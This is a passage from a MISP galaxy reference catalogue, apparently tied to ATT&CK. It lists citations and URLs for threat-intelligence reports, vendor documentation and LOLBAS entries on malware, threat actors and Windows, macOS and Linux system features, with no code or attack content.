The tag is: misp-galaxy:references="Systemd Service Units"

Table 15571. Table References

Links

https://www.freedesktop.org/software/systemd/man/systemd.service.html

systemdsleep Linux

Man7. (n.d.). systemd-sleep.conf(5) — Linux manual page. Retrieved June 7, 2023.

The tag is: misp-galaxy:references="systemdsleep Linux"

Table 15572. Table References

Links

https://man7.org/linux/man-pages/man5/systemd-sleep.conf.5.html

Freedesktop.org Linux systemd 29SEP2018

Freedesktop.org. (2018, September 29). systemd System and Service Manager. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Freedesktop.org Linux systemd 29SEP2018"

Table 15573. Table References

Links

https://www.freedesktop.org/wiki/Software/systemd/

archlinux Systemd Timers Aug 2020

archlinux. (2020, August 11). systemd/Timers. Retrieved October 12, 2020.

The tag is: misp-galaxy:references="archlinux Systemd Timers Aug 2020"

Table 15574. Table References

Links

https://wiki.archlinux.org/index.php/Systemd/Timers

TechNet Systeminfo

Microsoft. (n.d.). Systeminfo. Retrieved April 8, 2016.

The tag is: misp-galaxy:references="TechNet Systeminfo"

Table 15575. Table References

Links

https://technet.microsoft.com/en-us/library/bb491007.aspx

Peripheral Discovery macOS

SS64. (n.d.). system_profiler. Retrieved March 11, 2022.

The tag is: misp-galaxy:references="Peripheral Discovery macOS"

Table 15576. Table References

Links

https://ss64.com/osx/system_profiler.html

MSDN System Time

Microsoft. (n.d.). System Time. Retrieved November 25, 2016.

The tag is: misp-galaxy:references="MSDN System Time"

Table 15577. Table References

Links

https://msdn.microsoft.com/ms724961.aspx

T1562.002_redcanaryco

redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021.

The tag is: misp-galaxy:references="T1562.002_redcanaryco"

Table 15578. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md

Palo Alto T9000 Feb 2016

Grunzweig, J. and Miller-Osborn, J.. (2016, February 4). T9000: Advanced Modular Backdoor Uses Complex Anti-Analysis Techniques. Retrieved April 15, 2016.

The tag is: misp-galaxy:references="Palo Alto T9000 Feb 2016"

Table 15579. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/

US-CERT TA18-068A 2018

US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.

The tag is: misp-galaxy:references="US-CERT TA18-068A 2018"

Table 15580. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA18-086A

Proofpoint TA416 November 2020

Proofpoint Threat Research Team. (2020, November 23). TA416 Goes to Ground and Returns with a Golang PlugX Malware Loader. Retrieved April 13, 2021.

The tag is: misp-galaxy:references="Proofpoint TA416 November 2020"

Table 15581. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader

NCC Group TA505

Terefos, A. (2020, November 18). TA505: A Brief History of Their Time. Retrieved July 14, 2022.

The tag is: misp-galaxy:references="NCC Group TA505"

Table 15582. Table References

Links

https://research.nccgroup.com/2020/11/18/ta505-a-brief-history-of-their-time/

ProofPoint SettingContent-ms July 2018

Proofpoint Staff. (2018, July 19). TA505 Abusing SettingContent-ms within PDF files to Distribute FlawedAmmyy RAT. Retrieved April 19, 2019.

The tag is: misp-galaxy:references="ProofPoint SettingContent-ms July 2018"

Table 15583. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat

IBM TA505 April 2020

Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020.

The tag is: misp-galaxy:references="IBM TA505 April 2020"

Table 15584. Table References

Links

https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/

Proofpoint TA505 October 2019

Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020.

The tag is: misp-galaxy:references="Proofpoint TA505 October 2019"

Table 15585. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader

Proofpoint TA505 June 2018

Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019.

The tag is: misp-galaxy:references="Proofpoint TA505 June 2018"

Table 15586. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times

TrendMicro TA505 Aug 2019

Trend Micro. (2019, August 27). TA505: Variety in Use of ServHelper and FlawedAmmyy. Retrieved February 22, 2021.

The tag is: misp-galaxy:references="TrendMicro TA505 Aug 2019"

Table 15587. Table References

Links

https://www.trendmicro.com/en_us/research/19/h/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy.html

Unit 42 TA551 Jan 2021

Duncan, B. (2021, January 7). TA551: Email Attack Campaign Switches from Valak to IcedID. Retrieved March 17, 2021.

The tag is: misp-galaxy:references="Unit 42 TA551 Jan 2021"

Table 15588. Table References

Links

https://unit42.paloaltonetworks.com/ta551-shathak-icedid/

IBM TA577 OneNote Malspam

IBM X-Force. (2023, May 30). TA577 OneNote Malspam Results in QakBot Deployment. Retrieved January 24, 2024.

The tag is: misp-galaxy:references="IBM TA577 OneNote Malspam"

Table 15589. Table References

Links

https://exchange.xforce.ibmcloud.com/threats/guid:7f0659d266174b9a9ba40c618b853782

Cobalt Strike TTPs Dec 2017

Cobalt Strike. (2017, December 8). Tactics, Techniques, and Procedures. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Cobalt Strike TTPs Dec 2017"

Table 15590. Table References

Links

https://www.cobaltstrike.com/downloads/reports/tacticstechniquesandprocedures.pdf

Reuters Taiwan BlackTech August 2020

Lee, Y. (2020, August 19). Taiwan says China behind cyberattacks on government agencies, emails. Retrieved April 6, 2022.

The tag is: misp-galaxy:references="Reuters Taiwan BlackTech August 2020"

Table 15591. Table References

Links

https://www.reuters.com/article/us-taiwan-cyber-china/taiwan-says-china-behind-cyberattacks-on-government-agencies-emails-idUSKCN25F0JK

Microsoft Process Snapshot

Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="Microsoft Process Snapshot"

Table 15592. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx

Lacework TeamTNT May 2021

Stroud, J. (2021, May 25). Taking TeamTNT’s Docker Images Offline. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Lacework TeamTNT May 2021"

Table 15593. Table References

Links

https://www.lacework.com/blog/taking-teamtnt-docker-images-offline/

Splunk Kovar Certificates 2017

Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020.

The tag is: misp-galaxy:references="Splunk Kovar Certificates 2017"

Table 15594. Table References

Links

https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html

Dragos TALONITE

Dragos. (null). TALONITE. Retrieved February 25, 2021.

The tag is: misp-galaxy:references="Dragos TALONITE"

Table 15595. Table References

Links

https://www.dragos.com/threat/talonite/

Talos Sodinokibi April 2019

Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020.

The tag is: misp-galaxy:references="Talos Sodinokibi April 2019"

Table 15596. Table References

Links

https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html

Medium Event Tracing Tampering 2018

Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved June 7, 2019.

The tag is: misp-galaxy:references="Medium Event Tracing Tampering 2018"

Table 15597. Table References

Links

https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63

Tar.exe - LOLBAS Project

LOLBAS. (2023, January 30). Tar.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Tar.exe - LOLBAS Project"

Table 15598. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Tar/

Netskope GCP Redirection

Ashwin Vamshi. (2019, January 24). Targeted Attacks Abusing Google Cloud Platform Open Redirection. Retrieved August 18, 2022.

The tag is: misp-galaxy:references="Netskope GCP Redirection"

Table 15599. Table References

Links

https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection

AhnLab Andariel Subgroup of Lazarus June 2018

AhnLab. (2018, June 23). Targeted attacks by Andariel Threat Group, a subgroup of the Lazarus. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="AhnLab Andariel Subgroup of Lazarus June 2018"

Table 15600. Table References

Links

http://download.ahnlab.com/global/brochure/%5BAnalysis%5DAndariel_Group.pdf

dharma_ransomware

Loui, E. Scheuerman, K. et al. (2020, April 16). Targeted Dharma Ransomware Intrusions Exhibit Consistent Techniques. Retrieved January 26, 2022.

The tag is: misp-galaxy:references="dharma_ransomware"

Table 15601. Table References

Links

https://www.crowdstrike.com/blog/targeted-dharma-ransomware-intrusions-exhibit-consistent-techniques/

Targeted SSL Stripping Attacks Are Real

Check Point. (n.d.). Targeted SSL Stripping Attacks Are Real. Retrieved May 24, 2023.

The tag is: misp-galaxy:references="Targeted SSL Stripping Attacks Are Real"

Table 15602. Table References

Links

https://blog.checkpoint.com/research/targeted-ssl-stripping-attacks-are-real/amp/

CFR Vaccine Development Threats

Council on Foreign Relations. (2020, November 28). Targeting of companies involved in vaccine development. Retrieved October 30, 2023.

The tag is: misp-galaxy:references="CFR Vaccine Development Threats"

Table 15603. Table References

Links

https://www.cfr.org/cyber-operations/targeting-companies-involved-vaccine-development

Tarrask scheduled task

Microsoft Threat Intelligence Team & Detection and Response Team . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion. Retrieved June 1, 2022.

The tag is: misp-galaxy:references="Tarrask scheduled task"

Table 15604. Table References

Links

https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/

Microsoft Tasklist

Microsoft. (n.d.). Tasklist. Retrieved December 23, 2015.

The tag is: misp-galaxy:references="Microsoft Tasklist"

Table 15605. Table References

Links

https://technet.microsoft.com/en-us/library/bb491010.aspx

Microsoft Tasks

Microsoft. (2018, May 31). Tasks. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft Tasks"

Table 15606. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks

TechNet Task Scheduler Security

Microsoft. (2005, January 21). Task Scheduler and security. Retrieved June 8, 2016.

The tag is: misp-galaxy:references="TechNet Task Scheduler Security"

Table 15607. Table References

Links

https://technet.microsoft.com/en-us/library/cc785125.aspx

tau bundlore erika noerenberg 2020

Erika Noerenberg. (2020, June 29). TAU Threat Analysis: Bundlore (macOS) mm-install-macos. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="tau bundlore erika noerenberg 2020"

Table 15608. Table References

Links

https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html

CarbonBlack Conti July 2020

Baskin, B. (2020, July 8). TAU Threat Discovery: Conti Ransomware. Retrieved February 17, 2021.

The tag is: misp-galaxy:references="CarbonBlack Conti July 2020"

Table 15609. Table References

Links

https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/

CarbonBlack LockerGoga 2019

CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification – LockerGoga Ransomware. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="CarbonBlack LockerGoga 2019"

Table 15610. Table References

Links

https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/

GitHub Turla Driver Loader

TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved April 22, 2021.

The tag is: misp-galaxy:references="GitHub Turla Driver Loader"

Table 15611. Table References

Links

https://github.com/hfiref0x/TDL

S1 Old Rat New Tricks

Landry, J. (2016, April 21). Teaching an old RAT new tricks. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="S1 Old Rat New Tricks"

Table 15612. Table References

Links

https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/

Teams.exe - LOLBAS Project

LOLBAS. (2022, January 17). Teams.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Teams.exe - LOLBAS Project"

Table 15613. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Teams/

TeamTNT Cloud Enumeration

Nathaniel Quist. (2021, June 4). TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations. Retrieved February 8, 2022.

The tag is: misp-galaxy:references="TeamTNT Cloud Enumeration"

Table 15614. Table References

Links

https://unit42.paloaltonetworks.com/teamtnt-operations-cloud-environments

Intezer TeamTNT Explosion September 2021

Intezer. (2021, September 1). TeamTNT Cryptomining Explosion. Retrieved October 15, 2021.

The tag is: misp-galaxy:references="Intezer TeamTNT Explosion September 2021"

Table 15615. Table References

Links

https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf

Cisco Talos Intelligence Group

Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved August 4, 2022.

The tag is: misp-galaxy:references="Cisco Talos Intelligence Group"

Table 15616. Table References

Links

https://blog.talosintelligence.com/teamtnt-targeting-aws-alibaba-2/

Talos TeamTNT

Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved July 8, 2022.

The tag is: misp-galaxy:references="Talos TeamTNT"

Table 15617. Table References

Links

https://blog.talosintelligence.com/2022/04/teamtnt-targeting-aws-alibaba.html

Cado Security TeamTNT Worm August 2020

Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Cado Security TeamTNT Worm August 2020"

Table 15618. Table References

Links

https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/

ATT TeamTNT Chimaera September 2020

AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="ATT TeamTNT Chimaera September 2020"

Table 15619. Table References

Links

https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera

OSX Coldroot RAT

Patrick Wardle. (2018, February 17). Tearing Apart the Undetected (OSX)Coldroot RAT. Retrieved August 8, 2019.

The tag is: misp-galaxy:references="OSX Coldroot RAT"

Table 15620. Table References

Links

https://objective-see.com/blog/blog_0x2A.html

Kaspersky ProjectSauron Technical Analysis

Kaspersky Lab’s Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Technical Analysis. Retrieved August 17, 2016.

The tag is: misp-galaxy:references="Kaspersky ProjectSauron Technical Analysis"

Table 15621. Table References

Links

https://securelist.com/files/2016/07/The-ProjectSauron-APT_Technical_Analysis_KL.pdf

McAfee Babuk February 2021

Mundo, A. et al. (2021, February). Technical Analysis of Babuk Ransomware. Retrieved August 11, 2021.

The tag is: misp-galaxy:references="McAfee Babuk February 2021"

Table 15622. Table References

Links

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf

McAfee Cuba April 2021

Roccio, T., et al. (2021, April). Technical Analysis of Cuba Ransomware. Retrieved June 18, 2021.

The tag is: misp-galaxy:references="McAfee Cuba April 2021"

Table 15623. Table References

Links

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf

McAfee Dianxun March 2021

Roccia, T., Seret, T., Fokker, J. (2021, March 16). Technical Analysis of Operation Dianxun. Retrieved April 13, 2021.

The tag is: misp-galaxy:references="McAfee Dianxun March 2021"

Table 15624. Table References

Links

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf

Zscaler Pikabot May 24 2023

Brett Stone-Gross, Nikolaos Pantazopoulos. (2023, May 24). Technical Analysis of Pikabot. Retrieved January 11, 2024.

The tag is: misp-galaxy:references="Zscaler Pikabot May 24 2023"

Table 15625. Table References

Links

https://www.zscaler.com/blogs/security-research/technical-analysis-pikabot

Crowdstrike WhisperGate January 2022

Crowdstrike. (2022, January 19). Technical Analysis of the WhisperGate Malicious Bootloader. Retrieved March 10, 2022.

The tag is: misp-galaxy:references="Crowdstrike WhisperGate January 2022"

Table 15626. Table References

Links

https://www.crowdstrike.com/blog/technical-analysis-of-whispergate-malware

Apple TN2459 Kernel Extensions

Apple. (2018, April 19). Technical Note TN2459: User-Approved Kernel Extension Loading. Retrieved June 30, 2020.

The tag is: misp-galaxy:references="Apple TN2459 Kernel Extensions"

Table 15627. Table References

Links

https://developer.apple.com/library/archive/technotes/tn2459/_index.html

GovCERT Carbon May 2016

GovCERT. (2016, May 23). Technical Report about the Espionage Case at RUAG. Retrieved November 7, 2018.

The tag is: misp-galaxy:references="GovCERT Carbon May 2016"

Table 15628. Table References

Links

https://web.archive.org/web/20170718174931/https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf

Palo Alto Office Test Sofacy

Falcone, R. (2016, July 20). Technical Walkthrough: Office Test Persistence Method Used In Recent Sofacy Attacks. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="Palo Alto Office Test Sofacy"

Table 15629. Table References

Links

https://researchcenter.paloaltonetworks.com/2016/07/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/

te.exe - LOLBAS Project

LOLBAS. (2018, May 25). te.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="te.exe - LOLBAS Project"

Table 15630. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/

ESET Telebots June 2017

Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020.

The tag is: misp-galaxy:references="ESET Telebots June 2017"

Table 15631. Table References

Links

https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/

SANS Brian Wiltse Template Injection

Wiltse, B.. (2018, November 7). Template Injection Attacks - Bypassing Security Controls by Living off the Land. Retrieved April 10, 2019.

The tag is: misp-galaxy:references="SANS Brian Wiltse Template Injection"

Table 15632. Table References

Links

https://www.sans.org/reading-room/whitepapers/testing/template-injection-attacks-bypassing-security-controls-living-land-38780

Amazon AWS Temporary Security Credentials

Amazon. (n.d.). Temporary Security Credentials. Retrieved October 18, 2019.

The tag is: misp-galaxy:references="Amazon AWS Temporary Security Credentials"

Table 15633. Table References

Links

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html

Elastic Process Injection July 2017

Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.

The tag is: misp-galaxy:references="Elastic Process Injection July 2017"

Table 15634. Table References

Links

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

TestWindowRemoteAgent.exe - LOLBAS Project

LOLBAS. (2023, August 21). TestWindowRemoteAgent.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="TestWindowRemoteAgent.exe - LOLBAS Project"

Table 15635. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Testwindowremoteagent/

Sygnia Elephant Beetle Jan 2022

Sygnia Incident Response Team. (2022, January 5). TG2003: ELEPHANT BEETLE UNCOVERING AN ORGANIZED FINANCIAL-THEFT OPERATION. Retrieved February 9, 2023.

The tag is: misp-galaxy:references="Sygnia Elephant Beetle Jan 2022"

Table 15636. Table References

Links

https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf?hstc=147695848.3e8f1a482c8f8d4531507747318e660b.1680005306711.1680005306711.1680005306711.1&hssc=147695848.1.1680005306711&hsfp=3000179024&hsCtaTracking=189ec409-ae2d-4909-8bf1-62dcdd694372%7Cca91d317-8f10-4a38-9f80-367f551ad64d

Domain_Steal_CC

Krebs, B. (2018, November 13). That Domain You Forgot to Renew? Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.

The tag is: misp-galaxy:references="Domain_Steal_CC"

Table 15637. Table References

Links

https://krebsonsecurity.com/2018/11/that-domain-you-forgot-to-renew-yeah-its-now-stealing-credit-cards/

Kali Hydra

Kali. (2014, February 18). THC-Hydra. Retrieved November 2, 2017.

The tag is: misp-galaxy:references="Kali Hydra"

Table 15638. Table References

Links

https://tools.kali.org/password-attacks/hydra

Adventures of a Keystroke

Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.

The tag is: misp-galaxy:references="Adventures of a Keystroke"

Table 15639. Table References

Links

http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf

ThreatConnect Anthem

ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016.

The tag is: misp-galaxy:references="ThreatConnect Anthem"

Table 15640. Table References

Links

https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/

Talos Cobalt Strike September 2020

Mavis, N. (2020, September 21). The Art and Science of Detecting Cobalt Strike. Retrieved April 6, 2021.

The tag is: misp-galaxy:references="Talos Cobalt Strike September 2020"

Table 15641. Table References

Links

https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf

wardle chp2 persistence

Patrick Wardle. (2022, January 1). The Art of Mac Malware Volume 0x1:Analysis. Retrieved April 19, 2022.

The tag is: misp-galaxy:references="wardle chp2 persistence"

Table 15642. Table References

Links

https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf

wardle artofmalware volume1

Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021.

The tag is: misp-galaxy:references="wardle artofmalware volume1"

Table 15643. Table References

Links

https://taomm.org/vol1/pdfs.html

ArtOfMemoryForensics

Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="ArtOfMemoryForensics"

STIG Audit Kernel Modules

Unified Compliance Framework. (2016, December 20). The audit system must be configured to audit the loading and unloading of dynamic kernel modules.. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="STIG Audit Kernel Modules"

Table 15644. Table References

Links

https://www.stigviewer.com/stig/oracle_linux_5/2016-12-20/finding/V-22383

Medium Metamorfo Apr 2020

Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020.

The tag is: misp-galaxy:references="Medium Metamorfo Apr 2020"

Table 15645. Table References

Links

https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767

Gigamon Berserk Bear October 2021

Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.

The tag is: misp-galaxy:references="Gigamon Berserk Bear October 2021"

Table 15646. Table References

Links

https://vblocalhost.com/uploads/VB2021-Slowik.pdf

Kaspersky Emotet Jan 2019

Shulmin, A. . (2015, April 9). The Banking Trojan Emotet: Detailed Analysis. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="Kaspersky Emotet Jan 2019"

Table 15647. Table References

Links

https://securelist.com/the-banking-trojan-emotet-detailed-analysis/69560/

Symantec Black Vine

DiMaggio, J.. (2015, August 6). The Black Vine cyberespionage group. Retrieved January 26, 2016.

The tag is: misp-galaxy:references="Symantec Black Vine"

Table 15648. Table References

Links

https://web.archive.org/web/20170823094836/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf

Group IB GrimAgent July 2021

Priego, A. (2021, July). THE BROTHERS GRIM: THE REVERSING TALE OF GRIMAGENT MALWARE USED BY RYUK. Retrieved July 16, 2021.

The tag is: misp-galaxy:references="Group IB GrimAgent July 2021"

Table 15649. Table References

Links

https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis#pdfviewer

RSA Carbanak November 2017

RSA. (2017, November 21). THE CARBANAK/FIN7 SYNDICATE A HISTORICAL OVERVIEW OF AN EVOLVING THREAT. Retrieved July 29, 2020.

The tag is: misp-galaxy:references="RSA Carbanak November 2017"

Table 15650. Table References

Links

https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdf

Picus Emotet Dec 2018

Özarslan, S. (2018, December 21). The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="Picus Emotet Dec 2018"

Table 15651. Table References

Links

https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html

Medium Ali Salem Bumblebee April 2022

Salem, A. (2022, April 27). The chronicles of Bumblebee: The Hook, the Bee, and the Trickbot connection. Retrieved September 2, 2022.

The tag is: misp-galaxy:references="Medium Ali Salem Bumblebee April 2022"

Table 15652. Table References

Links

https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056

MSDN COM Elevation

Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016.

The tag is: misp-galaxy:references="MSDN COM Elevation"

Table 15653. Table References

Links

https://msdn.microsoft.com/en-us/library/ms679687.aspx

Microsoft Component Object Model

Microsoft. (n.d.). The Component Object Model. Retrieved August 18, 2016.

The tag is: misp-galaxy:references="Microsoft Component Object Model"

Table 15654. Table References

Links

https://msdn.microsoft.com/library/ms694363.aspx

SANS Conficker

Burton, K. (n.d.). The Conficker Worm. Retrieved February 18, 2021.

The tag is: misp-galaxy:references="SANS Conficker"

Table 15655. Table References

Links

https://web.archive.org/web/20200125132645/https://www.sans.org/security-resources/malwarefaq/conficker-worm

Symantec DDoS October 2014

Wueest, C.. (2014, October 21). The continued rise of DDoS attacks. Retrieved April 24, 2019.

The tag is: misp-galaxy:references="Symantec DDoS October 2014"

Table 15656. Table References

Links

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf

BlackBerry CostaRicto November 2020

The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021.

The tag is: misp-galaxy:references="BlackBerry CostaRicto November 2020"

Table 15657. Table References

Links

https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced

SecureWorks Mia Ash July 2017

Counter Threat Unit Research Team. (2017, July 27). The Curious Case of Mia Ash: Fake Persona Lures Middle Eastern Targets. Retrieved February 26, 2018.

The tag is: misp-galaxy:references="SecureWorks Mia Ash July 2017"

Table 15658. Table References

Links

https://www.secureworks.com/research/the-curious-case-of-mia-ash

Trustwave IIS Module 2013

Grunzweig, J. (2013, December 9). The Curious Case of the Malicious IIS Module. Retrieved June 3, 2021.

The tag is: misp-galaxy:references="Trustwave IIS Module 2013"

Table 15659. Table References

Links

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-curious-case-of-the-malicious-iis-module/

CloudSploit - Unused AWS Regions

CloudSploit. (2019, June 8). The Danger of Unused AWS Regions. Retrieved October 8, 2019.

The tag is: misp-galaxy:references="CloudSploit - Unused AWS Regions"

Table 15660. Table References

Links

https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc

Dormann Dangers of VHD 2019

Dormann, W. (2019, September 4). The Dangers of VHD and VHDX Files. Retrieved March 16, 2021.

The tag is: misp-galaxy:references="Dormann Dangers of VHD 2019"

Table 15661. Table References

Links

https://insights.sei.cmu.edu/cert/2019/09/the-dangers-of-vhd-and-vhdx-files.html

Kaspersky Darkhotel

Kaspersky Lab’s Global Research and Analysis Team. (2014, November). The Darkhotel APT A Story of Unusual Hospitality. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Kaspersky Darkhotel"

Table 15662. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf

ESET ForSSHe December 2018

Dumont, R., M.Léveillé, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020.

The tag is: misp-galaxy:references="ESET ForSSHe December 2018"

Table 15663. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf

Securelist Dropping Elephant

Kaspersky Lab’s Global Research & Analysis Team. (2016, July 8). The Dropping Elephant – aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="Securelist Dropping Elephant"

Table 15664. Table References

Links

https://securelist.com/the-dropping-elephant-actor/75328/

F-Secure The Dukes

F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.

The tag is: misp-galaxy:references="F-Secure The Dukes"

Table 15665. Table References

Links

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

Kaspersky Duqu 2.0

Kaspersky Lab. (2015, June 11). The Duqu 2.0. Retrieved April 21, 2017.

The tag is: misp-galaxy:references="Kaspersky Duqu 2.0"

Table 15666. Table References

Links

https://securelist.com/files/2015/06/The_Mystery_of_Duqu_2_0_a_sophisticated_cyberespionage_actor_returns.pdf

Symantec Elderwood Sept 2012

O’Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="Symantec Elderwood Sept 2012"

Table 15667. Table References

Links

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

Kaspersky Turla Aug 2014

